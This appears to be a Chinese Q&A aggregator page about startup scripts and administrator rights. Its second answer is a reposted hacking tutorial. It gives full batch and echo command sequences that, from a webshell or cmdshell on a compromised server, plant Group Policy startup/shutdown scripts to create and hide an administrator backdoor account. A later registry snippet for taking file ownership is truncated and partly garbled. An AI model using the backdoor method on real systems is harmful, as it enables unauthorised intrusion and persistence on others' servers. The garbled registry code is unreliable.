當前位置:首頁 » 網頁前端 » 開腳本禁用管理員
擴展閱讀
提分平台的賬號密碼是什麼 2023-08-31 22:07:10
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

開腳本禁用管理員

發布時間: 2022-07-02 21:56:44

『壹』 域內計算機開機運行腳本,無管理員許可權

直接把腳本文件放在開機C:\Windows\system32\GroupPolicy\User\Scripts\Logon
或C:\Windows\system32\GroupPolicy\Machine\Scripts\Startup中,我這邊就是這樣做的,很好用,可以用林陽域內計算機掃描與管理系統批量掃描哪些計算機有開機或登錄啟動腳本文件。

『貳』 如何用bat文件解除管理員許可權

現在我們利用啟動腳本和批處理在獲得shell的情況下提升許可權第9法: 啟動腳本法!!首家批漏啊,大家可得看好了,我盡量廢話少說,言簡意賅的表述。 註:啟動腳本是邀請用戶登錄之前運行的批文件,它的功能類似於Win9X和DOS中的自動執行批處理文件autoexec.bat,由於腳本是在 windows登陸之前運行,所以我們可以修改腳本內容來對系統進行設置,如啟動一個後門程序,添加一個管理員帳號,修改管理員帳號等等,隨你想吧.嘎嘎.. 本文首先介紹通過webshell添加一個隱藏帳號(畢竟這才是大家最關心的:)),然後具體講解一下出現問題後的解決方法.如何添加一個帳號? 一.如果你可以直接寫文件,如用海洋. (1) 首先,我們用海洋編寫了一個新建管理員的批處理文件swords1.bat,如下: net user swords$Content$nbsp;eviloctal /add net localgroup administrators swords$Content$nbsp;/add 這個批處理文件加了一個管理員名為swords$,密碼為eviloctal的隱藏帳戶,將文件swords1.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup"下. (注意:c:\winnt是系統目錄,如果系統盤不是c盤,請相應修改為系統目錄即可.在本機中查看,你也許找不到GroupPolicy\ Machine\Scripts\Startup這個文件夾,可以選擇工具/文件夾選項/查看/單擊顯示所有文件和文件夾.在海洋中用fso可以顯示所有文件就不必多此一舉了。) (2)接下來編寫一個刪除管理員的批處理文件swords2.bat,很簡單,一句話即可,如下: net user swords$Content$nbsp;/del 這個批處理文件刪除一個管理員名為swords$的隱藏帳戶,將文件swords2.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown"下. (3)編寫一個啟動/關機腳本配置文件******s.ini (注意:******s是默認的配置文件名,不能改名!)如下: [Startup] 0CmdLine=swords1.bat 0Parameters= [Shutdown] 0CmdLine=swords2.bat 0Parameters= 將文件******s.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下. 二.如果你有一個cmdshell,有echo的許可權就可以了,這樣添加: (1)echo一個swords1.vbs啟動時用的文件 echo on error resume next> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup \swords1.vbs echo net user swords$Content$nbsp;eviloctal /add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs echo net localgroup administrators swords$Content$nbsp;/add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs 注意:第一行一定要用』>』,這樣才能刪除原數據. (2)echo一個swords2.vbs關閉時用的腳本文件 echo net user swords$Content$nbsp;/del> C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown\swords2.vbs (3)編寫一個啟動/關機腳本配置文件******s.ini echo [Startup] > C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini echo 0CmdLine=swords1.vbs >>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini echo 0Parameters= >>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini echo [Shutdown] >>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini echo 0CmdLine=swords2.vbs>>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini echo 0Parameters=>>C:\winnt\system32\GroupPolicy\Machine\Scripts\******s.ini 將文件******s.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下. 最後,等待伺服器重新啟動計算機或自己強制其啟動(手段很多啊)。然後你就等著玩吧。 注意:本方法使用時,須伺服器已經指派了計算機啟動腳本,否則本方法可能不成功。 三.如果你是本機,或已經連接了對方的3389,但是只有普通用戶許可權,怎麼辦? 在啟用計算機啟動/關機腳本前,必須進行指派.指派計算機啟動/關機腳本需要通過組策略MMC(管理控制台)管理單元進行: (1) 開始/運行/MMC,打開微軟控制台 (2) 按ctrl+M鍵,打開添加/刪除管理單元窗口,單擊添加。 (3) 在"添加獨立管理單元"對話框內選擇"組策略",點擊"添加"按鈕. (4) 擇預設的"本地計算機"組策略對象/完成/確定/確定,關閉窗口。 (5) 在生成的「本地計算機」策略中打開計算機配置/Windows設置/腳本(啟動/關閉)"節點,雙擊"啟動"或"關機"項目設置計算機啟動或關機時使用的腳本,單擊瀏覽加如您要啟動的腳本文件,確定。 (6)設置完畢,保存後退出組策略MMC管理單元。等組策略刷新後,這些腳本就會在計算機啟動和關機時起作用。 注意:你也可以直接打開gpedit.msc, 依次展開計算機配置/Windows設置/腳本(啟動/關閉),然後添加一個啟動腳本。然後依次展開「計算機配置/管理模板/系統/登陸,將「顯示啟動腳本的運行狀態」啟用。重新啟動之後看看吧,打開cmd,輸入net user swords$顯示詳細的信息,噶噶,多了一個用戶吧。

『叄』 管理員許可權禁用了,怎麼辦

本回答為復制搬運
建議你激活超級管理員許可權,方法有兩種,希望能幫到你,望採納。方法一:
在桌面建一個文本文檔(也就是.txt文件).雙擊打開.把下面的代碼復制進去.再把這個文本文件改名為1.reg(一般電腦已知後綴是隱藏起來的,也就是說你新建的文本文件名字是"新建文本文檔"而不是"新建文本文檔.txt"如果是這樣,你就要先打開"計算機",左上角有個"組織",點開後有個"文件夾和搜索選項",然後"查看"然後下面有個"顯示隱藏的文件,文件夾和驅動器"把這個選上再"確定一下"那個文本文件名字就是"新建文本文檔.txt"了.再把它的名字改成 1.reg )如果改完後提示後綴改變,那就說明改對了.雙擊打開改好的文件,提示寫入注冊表,後你就有全部管理員許可權了.
復制以下代碼:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理員取得所有權"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理員取得所有權"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1 2;" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理員取得所有權"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \
方法二:
右鍵點"計算機"在選"管理",裡面有個"本地用戶和組",再在Administrator點右鍵,把禁用關掉.這個才是有全部許可權的管理員,再在關機的地方切換到管理員用戶,把其它用戶刪掉就可以了(刪掉後的這個用戶里的桌面上等等地方的信息會再提示保存下來的),這裡面你才可以完全操作你的電腦.才有全部許可權

『肆』 怎樣禁用和開啟用戶administrator

1、在Windows桌面中按下Windows徽標鍵+X鍵,打開超級菜單,選擇「以管理員身份運行命令行菜單」。

    閱讀全文

    與開腳本禁用管理員相關的內容

    本站內容整理源於互聯網,如有問題請聯系解決。
    Copyright design: www.gotrillian.com since 2022